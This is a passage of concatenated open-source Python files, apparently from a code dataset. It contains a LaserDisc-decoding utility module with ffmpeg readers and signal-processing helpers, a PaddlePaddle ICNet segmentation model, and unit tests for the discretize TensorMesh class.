def __init__(self, input_args=[], output_args=[]):
self.input_args = input_args
self.output_args = output_args
# ffmpeg subprocess
self.ffmpeg = None
# The number of the next byte ffmpeg will return
self.position = 0
# Keep a buffer of recently-read data, to allow seeking backwards by
# small amounts. The last byte returned by ffmpeg is at the end of
# this buffer.
self.rewind_size = 2 * 1024 * 1024
self.rewind_buf = b""
def __del__(self):
if self.ffmpeg is not None:
self.ffmpeg.kill()
self.ffmpeg.wait()
def _read_data(self, count):
"""Read data as bytes from ffmpeg, append it to the rewind buffer, and
return it. May return less than count bytes if EOF is reached."""
data = self.ffmpeg.stdout.read(count)
self.position += len(data)
self.rewind_buf += data
self.rewind_buf = self.rewind_buf[-self.rewind_size :]
return data
def read(self, infile, sample, readlen):
sample_bytes = sample * 2
readlen_bytes = readlen * 2
if self.ffmpeg is None:
command = ["ffmpeg", "-hide_banner", "-loglevel", "error"]
command += self.input_args
command += ["-i", "-"]
command += self.output_args
command += ["-c:a", "pcm_s16le", "-f", "s16le", "-"]
self.ffmpeg = subprocess.Popen(
command, stdin=infile, stdout=subprocess.PIPE
)
if sample_bytes < self.position:
# Seeking backwards - use data from rewind_buf
start = len(self.rewind_buf) - (self.position - sample_bytes)
end = min(start + readlen_bytes, len(self.rewind_buf))
if start < 0:
raise IOError("Seeking too far backwards with ffmpeg")
buf_data = self.rewind_buf[start:end]
sample_bytes += len(buf_data)
readlen_bytes -= len(buf_data)
else:
buf_data = b""
while sample_bytes > self.position:
# Seeking forwards - read and discard samples
count = min(sample_bytes - self.position, self.rewind_size)
self._read_data(count)
if readlen_bytes > 0:
# Read some new data from ffmpeg
read_data = self._read_data(readlen_bytes)
if len(read_data) < readlen_bytes:
# Short read - end of file
return None
else:
read_data = b""
data = buf_data + read_data
assert len(data) == readlen * 2
return np.fromstring(data, "<i2")
def __call__(self, infile, sample, readlen):
return self.read(infile, sample, readlen)
class LoadLDF:
"""Load samples from an .ldf file, using ld-ldf-reader which itself uses ffmpeg."""
def __init__(self, filename, input_args=[], output_args=[]):
self.input_args = input_args
self.output_args = output_args
self.filename = filename
# The number of the next byte ld-ldf-reader will return
self.position = 0
# Keep a buffer of recently-read data, to allow seeking backwards by
# small amounts. The last byte returned by ffmpeg is at the end of
# this buffer.
self.rewind_size = 2 * 1024 * 1024
self.rewind_buf = b""
self.ldfreader = None
# ld-ldf-reader subprocess
self.ldfreader = self._open(0)
def __del__(self):
self._close()
def _read_data(self, count):
"""Read data as bytes from ffmpeg, append it to the rewind buffer, and
return it. May return less than count bytes if EOF is reached."""
data = self.ldfreader.stdout.read(count)
self.position += len(data)
self.rewind_buf += data
self.rewind_buf = self.rewind_buf[-self.rewind_size :]
return data
def _close(self):
try:
if self.ldfreader is not None:
self.ldfreader.kill()
self.ldfreader.wait()
del self.ldfreader
self.ldfreader = None
except:
pass
def _open(self, sample):
self._close()
command = ["ld-ldf-reader", self.filename, str(sample)]
ldfreader = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.position = sample * 2
self.rewind_buf = b""
return ldfreader
def read(self, infile, sample, readlen):
sample_bytes = sample * 2
readlen_bytes = readlen * 2
if self.ldfreader is None or ((sample_bytes - self.position) > 40000000):
self.ldfreader = self._open(sample)
if sample_bytes < self.position:
# Seeking backwards - use data from rewind_buf
start = len(self.rewind_buf) - (self.position - sample_bytes)
end = min(start + readlen_bytes, len(self.rewind_buf))
if start < 0:
# raise IOError("Seeking too far backwards with ffmpeg")
self.ldfreader = self._open(sample)
buf_data = b""
else:
buf_data = self.rewind_buf[start:end]
sample_bytes += len(buf_data)
readlen_bytes -= len(buf_data)
elif (sample_bytes - self.position) > (40 * 1024 * 1024 * 2):
self.ldfreader = self._open(sample)
buf_data = b""
else:
buf_data = b""
while sample_bytes > self.position:
# Seeking forwards - read and discard samples
count = min(sample_bytes - self.position, self.rewind_size)
self._read_data(count)
if readlen_bytes > 0:
# Read some new data from ffmpeg
read_data = self._read_data(readlen_bytes)
if len(read_data) < readlen_bytes:
# Short read - end of file
return None
else:
read_data = b""
data = buf_data + read_data
assert len(data) == readlen * 2
return np.frombuffer(data, "<i2")
def __call__(self, infile, sample, readlen):
return self.read(infile, sample, readlen)
def ldf_pipe(outname, compression_level=6):
corecmd = "ffmpeg -y -hide_banner -loglevel error -f s16le -ar 40k -ac 1 -i - -acodec flac -f ogg".split(
" "
)
process = subprocess.Popen(
[*corecmd, "-compression_level", str(compression_level), outname],
stdin=subprocess.PIPE,
)
return process, process.stdin
# Git helpers
def get_git_info():
""" Return git branch and commit for current directory, iff available. """
branch = "UNKNOWN"
commit = "UNKNOWN"
try:
sp = subprocess.run(
"git rev-parse --abbrev-ref HEAD", shell=True, capture_output=True
)
branch = sp.stdout.decode("utf-8").strip() if not sp.returncode else "UNKNOWN"
sp = subprocess.run(
"git rev-parse --short HEAD", shell=True, capture_output=True
)
commit = sp.stdout.decode("utf-8").strip() if not sp.returncode else "UNKNOWN"
except:
pass
return branch, commit
# Essential standalone routines
pi = np.pi
tau = np.pi * 2
# https://stackoverflow.com/questions/20924085/python-conversion-between-coordinates
polar2z = lambda r, θ: r * np.exp(1j * θ)
deg2rad = lambda θ: θ * (np.pi / 180)
def emphasis_iir(t1, t2, fs):
"""Generate an IIR filter for 6dB/octave pre-emphasis (t1 > t2) or
de-emphasis (t1 < t2), given time constants for the two corners."""
# Convert time constants to frequencies, and pre-warp for bilinear transform
w1 = 2 * fs * np.tan((1 / t1) / (2 * fs))
w2 = 2 * fs * np.tan((1 / t2) / (2 * fs))
# Zero at t1, pole at t2
tf_b, tf_a = sps.zpk2tf([-w1], [-w2], w2 / w1)
return sps.bilinear(tf_b, tf_a, fs)
# This converts a regular B, A filter to an FFT of our selected block length
def filtfft(filt, blocklen):
return sps.freqz(filt[0], filt[1], blocklen, whole=1)[1]
@njit
def inrange(a, mi, ma):
return (a >= mi) & (a <= ma)
def sqsum(cmplx):
return np.sqrt((cmplx.real ** 2) + (cmplx.imag ** 2))
@njit(cache=True)
def calczc_findfirst(data, target, rising):
if rising:
for i in range(0, len(data)):
if data[i] >= target:
return i
return None
else:
for i in range(0, len(data)):
if data[i] <= target:
return i
return None
@njit(cache=True)
def calczc_do(data, _start_offset, target, edge=0, count=10):
start_offset = max(1, int(_start_offset))
icount = int(count + 1)
if edge == 0: # capture rising or falling edge
if data[start_offset] < target:
edge = 1
else:
edge = -1
loc = calczc_findfirst(
data[start_offset : start_offset + icount], target, edge == 1
)
if loc is None:
return None
x = start_offset + loc
a = data[x - 1] - target
b = data[x] - target
y = -a / (-a + b)
return x - 1 + y
def calczc(data, _start_offset, target, edge=0, count=10, reverse=False):
""" edge: -1 falling, 0 either, 1 rising """
if reverse:
# Instead of actually implementing this in reverse, use numpy to flip data
rev_zc = calczc_do(data[_start_offset::-1], 0, target, edge, count)
if rev_zc is None:
return None
return _start_offset - rev_zc
return calczc_do(data, _start_offset, target, edge, count)
def calczc_sets(data, start, end, tgt=0, cliplevel=None):
zcsets = {False: [], True: []}
bi = start
while bi < end:
if np.abs(data[bi]) > cliplevel:
zc = calczc(data, bi, tgt)
if zc is not None:
zcsets[data[bi] > tgt].append(offset)
bi = np.int(zc)
bi += 1
return {False: np.array(zcsets[False]), True: np.array(zcsets[True])}
# Shamelessly based on https://github.com/scipy/scipy/blob/v1.6.0/scipy/signal/signaltools.py#L2264-2267
# ... and intended for real FFT, but seems fine with complex as well ;)
def build_hilbert(fft_size):
if (fft_size // 2) - (fft_size / 2) != 0:
raise Exception("build_hilbert: must have even fft_size")
output = np.zeros(fft_size)
output[0] = output[fft_size // 2] = 1
output[1:fft_size // 2] = 2
return output
def unwrap_hilbert(hilbert, freq_hz):
tangles = np.angle(hilbert)
dangles = np.pad(np.diff(tangles), (1, 0), mode="constant")
# make sure unwapping goes the right way
if dangles[0] < -pi:
dangles[0] += tau
tdangles2 = np.unwrap(dangles)
# With extremely bad data, the unwrapped angles can jump.
while np.min(tdangles2) < 0:
tdangles2[tdangles2 < 0] += tau
while np.max(tdangles2) > tau:
tdangles2[tdangles2 > tau] -= tau
return tdangles2 * (freq_hz / tau)
def fft_determine_slices(center, min_bandwidth, freq_hz, bins_in):
''' returns the # of sub-bins needed to get center+/-min_bandwidth.
The returned lowbin is the first bin (symmetrically) needed to be saved.
This will need to be 'flipped' using fft_slice to get the trimmed set
'''
# compute the width of each bin
binwidth = freq_hz / bins_in
cbin = nb_round(center / binwidth)
# compute the needed number of fft bins...
bbins = nb_round(min_bandwidth / binwidth)
# ... and round that up to the next power of two
nbins = 2 * (2 ** math.ceil(math.log2(bbins * 2)))
lowbin = cbin - (nbins // 4)
cut_freq = binwidth * nbins
return lowbin, nbins, cut_freq
def fft_do_slice(fdomain, lowbin, nbins, blocklen):
''' Uses lowbin and nbins as returned from fft_determine_slices to
cut the fft '''
nbins_half = nbins//2
return np.concatenate([fdomain[lowbin:lowbin+nbins_half], fdomain[blocklen-lowbin-nbins_half:blocklen-lowbin]])
def genwave(rate, freq, initialphase=0):
""" Generate an FM waveform from target frequency data """
out = np.zeros(len(rate), dtype=np.double)
angle = initialphase
for i in range(0, len(rate)):
out[i] = np.sin(angle)
angle += np.pi * (rate[i] / freq)
if angle > np.pi:
angle -= tau
return out
# slightly faster than np.std for short arrays
@njit
def rms(arr):
return np.sqrt(np.mean(np.square(arr - np.mean(arr))))
# MTF calculations
def get_fmax(cavframe=0, laser=780, na=0.5, fps=30):
loc = 0.055 + ((cavframe / 54000) * 0.090)
return (2 * na / (laser / 1000)) * (2 * np.pi * fps) * loc
def compute_mtf(freq, cavframe=0, laser=780, na=0.52):
fmax = get_fmax(cavframe, laser, na)
freq_mhz = freq / 1000000
if type(freq_mhz) == np.ndarray:
freq_mhz[freq_mhz > fmax] = fmax
elif freq_mhz > fmax:
return 0
# from Compact Disc Technology AvHeitarō Nakajima, Hiroshi Ogawa page 17
return (2 / np.pi) * (
np.arccos(freq_mhz / fmax)
- ((freq_mhz / fmax) * np.sqrt(1 - ((freq_mhz / fmax) ** 2)))
)
def roundfloat(fl, places=3):
""" round float to (places) decimal places """
r = 10 ** places
return np.round(fl * r) / r
# Something like this should be a numpy function, but I can't find it.
@jit(cache=True)
def findareas(array, cross):
""" Find areas where `array` is <= `cross`
returns: array of tuples of said areas (begin, end, length)
"""
starts = np.where(np.logical_and(array[1:] < cross, array[:-1] >= cross))[0]
ends = np.where(np.logical_and(array[1:] >= cross, array[:-1] < cross))[0]
# remove 'dangling' beginnings and endings so everything zips up nicely and in order
if ends[0] < starts[0]:
ends = ends[1:]
if starts[-1] > ends[-1]:
starts = starts[:-1]
return [(*z, z[1] - z[0]) for z in zip(starts, ends)]
def findpulses(array, low, high):
""" Find areas where `array` is between `low` and `high`
returns: array of tuples of said areas (begin, end, length)
"""
Pulse = namedtuple("Pulse", "start len")
array_inrange = inrange(array, low, high)
starts = np.where(
np.logical_and(array_inrange[1:] == True, array_inrange[:-1] == False)
)[0]
ends = np.where(
np.logical_and(array_inrange[1:] == False, array_inrange[:-1] == True)
)[0]
if len(starts) == 0 or len(ends) == 0:
return []
# remove 'dangling' beginnings and endings so everything zips up nicely and in order
if ends[0] < starts[0]:
ends = ends[1:]
if starts[-1] > ends[-1]:
starts = starts[:-1]
return [Pulse(z[0], z[1] - z[0]) for z in zip(starts, ends)]
def findpeaks(array, low=0):
array2 = array.copy()
array2[np.where(array2 < low)] = 0
return [
loc - 1
for loc in np.where(
np.logical_and(array2[:-1] > array2[-1], array2[1:] > array2[:-1])
)[0]
]
# originally from http://www.paulinternet.nl/?page=bicubic
def cubic_interpolate(data, loc):
p = data[int(loc) - 1 : int(loc) + 3]
x = loc - np.floor(loc)
return p[1] + 0.5 * x * (
p[2]
- p[0]
+ x
* (
2.0 * p[0]
- 5.0 * p[1]
+ 4.0 * p[2]
- p[3]
+ x * (3.0 * (p[1] - p[2]) + p[3] - p[0])
)
)
def LRUupdate(l, k):
""" This turns a list into an LRU table. When called it makes sure item 'k' is at the beginning,
so the list is in descending order of previous use.
"""
try:
l.remove(k)
except:
pass
l.insert(0, k)
@njit
def nb_median(m):
return np.median(m)
@njit
def nb_round(m):
return int(np.round(m))
@njit
def nb_mean(m):
return np.mean(m)
@njit
def nb_min(m):
return np.min(m)
@njit
def nb_max(m):
return np.max(m)
@njit
def nb_abs(m):
return np.abs(m)
@njit
def nb_absmax(m):
return np.max(np.abs(m))
@njit
def nb_mul(x, y):
return x * y
@njit
def nb_where(x):
return np.where(x)
def angular_mean(x, cycle_len=1.0, zero_base=True):
""" Compute the mean phase, assuming 0..1 is one phase cycle
(Using this technique handles the 3.99, 5.01 issue
where otherwise the phase average would be 0.5. while a
naive computation could be changed to rotate around 0.5,
that breaks down when things are out of phase...)
"""
x2 = x - np.floor(x) # not strictly necessary but slightly more precise
# refer to https://en.wikipedia.org/wiki/Mean_of_circular_quantities
angles = [np.e ** (1j * f * np.pi * 2 / cycle_len) for f in x2]
am = np.angle(np.mean(angles)) / (np.pi * 2)
if zero_base and (am < 0):
am = 1 + am
return am
def phase_distance(x, c=0.75):
""" returns the shortest path between two phases (assuming x and c are in (0..1)) """
d = (x - np.floor(x)) - c
if d < -0.5:
d += 1
elif d > 0.5:
d -= 1
return d
# Used to help w/CX routines
@njit
def db_to_lev(db):
return 10 ** (db / 20)
@njit
def lev_to_db(rlev):
return 20 * np.log10(rlev)
# moved from core.py
@njit
def dsa_rescale(infloat):
return int(np.round(infloat * 32767 / 150000))
# Hotspot subroutines in FieldNTSC's compute_line_bursts function,
# removed so that they can be JIT'd
@njit(cache=True)
def clb_findnextburst(burstarea, i, endburstarea, threshold):
for j in range(i, endburstarea):
if np.abs(burstarea[j]) > threshold:
return burstarea[j], calczc_do(burstarea, j, 0)
return (None, None)
@njit(cache=True)
def distance_from_round(x):
# Yes, this was a hotspot.
return np.round(x) - x
# Write the .tbc.json file (used by lddecode and notebooks)
def write_json(ldd, outname):
jsondict = ldd.build_json(ldd.curfield)
fp = open(outname + ".tbc.json.tmp", "w")
json.dump(jsondict, fp, indent=4 if ldd.verboseVITS else None)
fp.write("\n")
fp.close()
os.rename(outname + ".tbc.json.tmp", outname + ".tbc.json")
# Write the .tbc.json file (used by lddecode and notebooks)
def write_json(ldd, jsondict, outname):
fp = open(outname + ".tbc.json.tmp", "w")
json.dump(jsondict, fp, indent=4 if ldd.verboseVITS else None)
fp.write("\n")
fp.close()
os.rename(outname + ".tbc.json.tmp", outname + ".tbc.json")
def jsondump_thread(ldd, outname):
"""
This creates a background thread to write a json dict to a file.
Probably had a bit too much fun here - this returns a queue that is
fed into a thread created by the function itself. Feed it json
dictionaries during runtime and None when done.
"""
def consume(q):
while True:
jsondict = q.get()
if jsondict is None:
q.task_done()
return
write_json(ldd, jsondict, outname)
q.task_done()
q = JoinableQueue()
# Start the self-contained thread
t = threading.Thread(target=consume, args=(q,))
t.start()
return q
class StridedCollector:
# This keeps a numpy buffer and outputs an fft block and keeps the overlap
# for the next fft.
def __init__(self, blocklen = 65536, stride = 2048):
self.buffer = None
self.blocklen = blocklen
self.stride = stride
def add(self, data):
if self.buffer is None:
self.buffer = data
else:
self.buffer = np.concatenate([self.buffer, data])
return self.have_block()
def have_block(self):
return (self.buffer is not None) and (len(self.buffer) >= self.blocklen)
def get_block(self):
if self.have_block():
rv = self.buffer[0:self.blocklen]
self.buffer = self.buffer[self.blocklen-self.stride:]
return rv
return None
if __name__ == "__main__":
print("Nothing to see here, move along ;)")
| gpl-3.0 |
lcy-seso/models | fluid/icnet/icnet.py | 1 | 9220 | import paddle.fluid as fluid
import numpy as np
import sys
def conv(input,
k_h,
k_w,
c_o,
s_h,
s_w,
relu=False,
padding="VALID",
biased=False,
name=None):
act = None
tmp = input
if relu:
act = "relu"
if padding == "SAME":
padding_h = max(k_h - s_h, 0)
padding_w = max(k_w - s_w, 0)
padding_top = padding_h / 2
padding_left = padding_w / 2
padding_bottom = padding_h - padding_top
padding_right = padding_w - padding_left
padding = [
0, 0, 0, 0, padding_top, padding_bottom, padding_left, padding_right
]
tmp = fluid.layers.pad(tmp, padding)
tmp = fluid.layers.conv2d(
tmp,
num_filters=c_o,
filter_size=[k_h, k_w],
stride=[s_h, s_w],
groups=1,
act=act,
bias_attr=biased,
use_cudnn=False,
name=name)
return tmp
def atrous_conv(input,
k_h,
k_w,
c_o,
dilation,
relu=False,
padding="VALID",
biased=False,
name=None):
act = None
if relu:
act = "relu"
tmp = input
if padding == "SAME":
padding_h = max(k_h - s_h, 0)
padding_w = max(k_w - s_w, 0)
padding_top = padding_h / 2
padding_left = padding_w / 2
padding_bottom = padding_h - padding_top
padding_right = padding_w - padding_left
padding = [
0, 0, 0, 0, padding_top, padding_bottom, padding_left, padding_right
]
tmp = fluid.layers.pad(tmp, padding)
tmp = fluid.layers.conv2d(
input,
num_filters=c_o,
filter_size=[k_h, k_w],
dilation=dilation,
groups=1,
act=act,
bias_attr=biased,
use_cudnn=False,
name=name)
return tmp
def zero_padding(input, padding):
return fluid.layers.pad(input,
[0, 0, 0, 0, padding, padding, padding, padding])
def bn(input, relu=False, name=None, is_test=False):
act = None
if relu:
act = 'relu'
name = input.name.split(".")[0] + "_bn"
tmp = fluid.layers.batch_norm(
input, act=act, momentum=0.95, epsilon=1e-5, name=name)
return tmp
def avg_pool(input, k_h, k_w, s_h, s_w, name=None, padding=0):
temp = fluid.layers.pool2d(
input,
pool_size=[k_h, k_w],
pool_type="avg",
pool_stride=[s_h, s_w],
pool_padding=padding,
name=name)
return temp
def max_pool(input, k_h, k_w, s_h, s_w, name=None, padding=0):
temp = fluid.layers.pool2d(
input,
pool_size=[k_h, k_w],
pool_type="max",
pool_stride=[s_h, s_w],
pool_padding=padding,
name=name)
return temp
def interp(input, out_shape):
out_shape = list(out_shape.astype("int32"))
return fluid.layers.resize_bilinear(input, out_shape=out_shape)
def dilation_convs(input):
tmp = res_block(input, filter_num=256, padding=1, name="conv3_2")
tmp = res_block(tmp, filter_num=256, padding=1, name="conv3_3")
tmp = res_block(tmp, filter_num=256, padding=1, name="conv3_4")
tmp = proj_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_1")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_2")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_3")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_4")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_5")
tmp = res_block(tmp, filter_num=512, padding=2, dilation=2, name="conv4_6")
tmp = proj_block(
tmp, filter_num=1024, padding=4, dilation=4, name="conv5_1")
tmp = res_block(tmp, filter_num=1024, padding=4, dilation=4, name="conv5_2")
tmp = res_block(tmp, filter_num=1024, padding=4, dilation=4, name="conv5_3")
return tmp
def pyramis_pooling(input, input_shape):
shape = np.ceil(input_shape / 32).astype("int32")
h, w = shape
pool1 = avg_pool(input, h, w, h, w)
pool1_interp = interp(pool1, shape)
pool2 = avg_pool(input, h / 2, w / 2, h / 2, w / 2)
pool2_interp = interp(pool2, shape)
pool3 = avg_pool(input, h / 3, w / 3, h / 3, w / 3)
pool3_interp = interp(pool3, shape)
pool4 = avg_pool(input, h / 4, w / 4, h / 4, w / 4)
pool4_interp = interp(pool4, shape)
conv5_3_sum = input + pool4_interp + pool3_interp + pool2_interp + pool1_interp
return conv5_3_sum
def shared_convs(image):
tmp = conv(image, 3, 3, 32, 2, 2, padding='SAME', name="conv1_1_3_3_s2")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 32, 1, 1, padding='SAME', name="conv1_2_3_3")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 64, 1, 1, padding='SAME', name="conv1_3_3_3")
tmp = bn(tmp, relu=True)
tmp = max_pool(tmp, 3, 3, 2, 2, padding=[1, 1])
tmp = proj_block(tmp, filter_num=128, padding=0, name="conv2_1")
tmp = res_block(tmp, filter_num=128, padding=1, name="conv2_2")
tmp = res_block(tmp, filter_num=128, padding=1, name="conv2_3")
tmp = proj_block(tmp, filter_num=256, padding=1, stride=2, name="conv3_1")
return tmp
def res_block(input, filter_num, padding=0, dilation=None, name=None):
tmp = conv(input, 1, 1, filter_num / 4, 1, 1, name=name + "_1_1_reduce")
tmp = bn(tmp, relu=True)
tmp = zero_padding(tmp, padding=padding)
if dilation is None:
tmp = conv(tmp, 3, 3, filter_num / 4, 1, 1, name=name + "_3_3")
else:
tmp = atrous_conv(
tmp, 3, 3, filter_num / 4, dilation, name=name + "_3_3")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 1, 1, filter_num, 1, 1, name=name + "_1_1_increase")
tmp = bn(tmp, relu=False)
tmp = input + tmp
tmp = fluid.layers.relu(tmp)
return tmp
def proj_block(input, filter_num, padding=0, dilation=None, stride=1,
name=None):
proj = conv(
input, 1, 1, filter_num, stride, stride, name=name + "_1_1_proj")
proj_bn = bn(proj, relu=False)
tmp = conv(
input, 1, 1, filter_num / 4, stride, stride, name=name + "_1_1_reduce")
tmp = bn(tmp, relu=True)
tmp = zero_padding(tmp, padding=padding)
if padding == 0:
padding = 'SAME'
else:
padding = 'VALID'
if dilation is None:
tmp = conv(
tmp,
3,
3,
filter_num / 4,
1,
1,
padding=padding,
name=name + "_3_3")
else:
tmp = atrous_conv(
tmp,
3,
3,
filter_num / 4,
dilation,
padding=padding,
name=name + "_3_3")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 1, 1, filter_num, 1, 1, name=name + "_1_1_increase")
tmp = bn(tmp, relu=False)
tmp = proj_bn + tmp
tmp = fluid.layers.relu(tmp)
return tmp
def sub_net_4(input, input_shape):
tmp = interp(input, out_shape=np.ceil(input_shape / 32))
tmp = dilation_convs(tmp)
tmp = pyramis_pooling(tmp, input_shape)
tmp = conv(tmp, 1, 1, 256, 1, 1, name="conv5_4_k1")
tmp = bn(tmp, relu=True)
tmp = interp(tmp, input_shape / 16)
return tmp
def sub_net_2(input):
tmp = conv(input, 1, 1, 128, 1, 1, name="conv3_1_sub2_proj")
tmp = bn(tmp, relu=False)
return tmp
def sub_net_1(input):
tmp = conv(input, 3, 3, 32, 2, 2, padding='SAME', name="conv1_sub1")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 32, 2, 2, padding='SAME', name="conv2_sub1")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 3, 3, 64, 2, 2, padding='SAME', name="conv3_sub1")
tmp = bn(tmp, relu=True)
tmp = conv(tmp, 1, 1, 128, 1, 1, name="conv3_sub1_proj")
tmp = bn(tmp, relu=False)
return tmp
def CCF24(sub2_out, sub4_out, input_shape):
tmp = zero_padding(sub4_out, padding=2)
tmp = atrous_conv(tmp, 3, 3, 128, 2, name="conv_sub4")
tmp = bn(tmp, relu=False)
tmp = tmp + sub2_out
tmp = fluid.layers.relu(tmp)
tmp = interp(tmp, input_shape / 8)
return tmp
def CCF124(sub1_out, sub24_out, input_shape):
tmp = zero_padding(sub24_out, padding=2)
tmp = atrous_conv(tmp, 3, 3, 128, 2, name="conv_sub2")
tmp = bn(tmp, relu=False)
tmp = tmp + sub1_out
tmp = fluid.layers.relu(tmp)
tmp = interp(tmp, input_shape / 4)
return tmp
def icnet(data, num_classes, input_shape):
image_sub1 = data
image_sub2 = interp(data, out_shape=input_shape * 0.5)
s_convs = shared_convs(image_sub2)
sub4_out = sub_net_4(s_convs, input_shape)
sub2_out = sub_net_2(s_convs)
sub1_out = sub_net_1(image_sub1)
sub24_out = CCF24(sub2_out, sub4_out, input_shape)
sub124_out = CCF124(sub1_out, sub24_out, input_shape)
conv6_cls = conv(
sub124_out, 1, 1, num_classes, 1, 1, biased=True, name="conv6_cls")
sub4_out = conv(
sub4_out, 1, 1, num_classes, 1, 1, biased=True, name="sub4_out")
sub24_out = conv(
sub24_out, 1, 1, num_classes, 1, 1, biased=True, name="sub24_out")
return sub4_out, sub24_out, conv6_cls
| apache-2.0 |
simpeg/discretize | tests/base/test_tensor.py | 1 | 7915 | import numpy as np
import unittest
import discretize
from pymatsolver import Solver
TOL = 1e-10
class BasicTensorMeshTests(unittest.TestCase):
def setUp(self):
a = np.array([1, 1, 1])
b = np.array([1, 2])
c = np.array([1, 4])
self.mesh2 = discretize.TensorMesh([a, b], [3, 5])
self.mesh3 = discretize.TensorMesh([a, b, c])
def test_gridded_2D(self):
H = self.mesh2.h_gridded
test_hx = np.all(H[:, 0] == np.r_[1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
test_hy = np.all(H[:, 1] == np.r_[1.0, 1.0, 1.0, 2.0, 2.0, 2.0])
self.assertTrue(test_hx and test_hy)
def test_gridded_3D(self):
H = self.mesh3.h_gridded
test_hx = np.all(
H[:, 0] == np.r_[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
)
test_hy = np.all(
H[:, 1] == np.r_[1.0, 1.0, 1.0, 2.0, 2.0, 2.0, 1.0, 1.0, 1.0, 2.0, 2.0, 2.0]
)
test_hz = np.all(
H[:, 2] == np.r_[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 4.0, 4.0, 4.0, 4.0, 4.0]
)
self.assertTrue(test_hx and test_hy and test_hz)
def test_vectorN_2D(self):
testNx = np.array([3, 4, 5, 6])
testNy = np.array([5, 6, 8])
xtest = np.all(self.mesh2.vectorNx == testNx)
ytest = np.all(self.mesh2.vectorNy == testNy)
self.assertTrue(xtest and ytest)
def test_vectorCC_2D(self):
testNx = np.array([3.5, 4.5, 5.5])
testNy = np.array([5.5, 7])
xtest = np.all(self.mesh2.vectorCCx == testNx)
ytest = np.all(self.mesh2.vectorCCy == testNy)
self.assertTrue(xtest and ytest)
def test_area_3D(self):
test_area = np.array(
[
1,
1,
1,
1,
2,
2,
2,
2,
4,
4,
4,
4,
8,
8,
8,
8,
1,
1,
1,
1,
1,
1,
1,
1,
1,
4,
4,
4,
4,
4,
4,
4,
4,
4,
1,
1,
1,
2,
2,
2,
1,
1,
1,
2,
2,
2,
1,
1,
1,
2,
2,
2,
]
)
t1 = np.all(self.mesh3.area == test_area)
self.assertTrue(t1)
def test_vol_3D(self):
test_vol = np.array([1, 1, 1, 2, 2, 2, 4, 4, 4, 8, 8, 8])
t1 = np.all(self.mesh3.vol == test_vol)
self.assertTrue(t1)
def test_vol_2D(self):
test_vol = np.array([1, 1, 1, 2, 2, 2])
t1 = np.all(self.mesh2.vol == test_vol)
self.assertTrue(t1)
def test_edge_3D(self):
test_edge = np.array(
[
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
2,
2,
1,
1,
1,
1,
2,
2,
2,
2,
1,
1,
1,
1,
2,
2,
2,
2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
]
)
t1 = np.all(self.mesh3.edge == test_edge)
self.assertTrue(t1)
def test_edge_2D(self):
test_edge = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2])
t1 = np.all(self.mesh2.edge == test_edge)
self.assertTrue(t1)
def test_oneCell(self):
hx = np.array([1e-5])
M = discretize.TensorMesh([hx])
self.assertTrue(M.nC == 1)
def test_printing(self):
print(discretize.TensorMesh([10]))
print(discretize.TensorMesh([10, 10]))
print(discretize.TensorMesh([10, 10, 10]))
def test_centering(self):
M1d = discretize.TensorMesh([10], x0="C")
M2d = discretize.TensorMesh([10, 10], x0="CC")
M3d = discretize.TensorMesh([10, 10, 10], x0="CCC")
self.assertLess(np.abs(M1d.x0 + 0.5).sum(), TOL)
self.assertLess(np.abs(M2d.x0 + 0.5).sum(), TOL)
self.assertLess(np.abs(M3d.x0 + 0.5).sum(), TOL)
def test_negative(self):
M1d = discretize.TensorMesh([10], x0="N")
self.assertRaises(Exception, discretize.TensorMesh, [10], "F")
M2d = discretize.TensorMesh([10, 10], x0="NN")
M3d = discretize.TensorMesh([10, 10, 10], x0="NNN")
self.assertLess(np.abs(M1d.x0 + 1.0).sum(), TOL)
self.assertLess(np.abs(M2d.x0 + 1.0).sum(), TOL)
self.assertLess(np.abs(M3d.x0 + 1.0).sum(), TOL)
def test_cent_neg(self):
M3d = discretize.TensorMesh([10, 10, 10], x0="C0N")
self.assertLess(np.abs(M3d.x0 + np.r_[0.5, 0, 1.0]).sum(), TOL)
def test_tensor(self):
M = discretize.TensorMesh([[(10.0, 2)]])
self.assertLess(np.abs(M.hx - np.r_[10.0, 10.0]).sum(), TOL)
def test_serialization(self):
mesh = discretize.TensorMesh.deserialize(self.mesh2.serialize())
self.assertTrue(np.all(self.mesh2.x0 == mesh.x0))
self.assertTrue(np.all(self.mesh2.shape_cells == mesh.shape_cells))
self.assertTrue(np.all(self.mesh2.hx == mesh.hx))
self.assertTrue(np.all(self.mesh2.hy == mesh.hy))
self.assertTrue(np.all(self.mesh2.gridCC == mesh.gridCC))
class TestPoissonEqn(discretize.tests.OrderTest):
name = "Poisson Equation"
meshSizes = [10, 16, 20]
def getError(self):
# Create some functions to integrate
fun = (
lambda x: np.sin(2 * np.pi * x[:, 0])
* np.sin(2 * np.pi * x[:, 1])
* np.sin(2 * np.pi * x[:, 2])
)
sol = lambda x: -3.0 * ((2 * np.pi) ** 2) * fun(x)
self.M.setCellGradBC("dirichlet")
D = self.M.faceDiv
G = self.M.cellGrad
if self.forward:
sA = sol(self.M.gridCC)
sN = D * G * fun(self.M.gridCC)
err = np.linalg.norm((sA - sN), np.inf)
else:
fA = fun(self.M.gridCC)
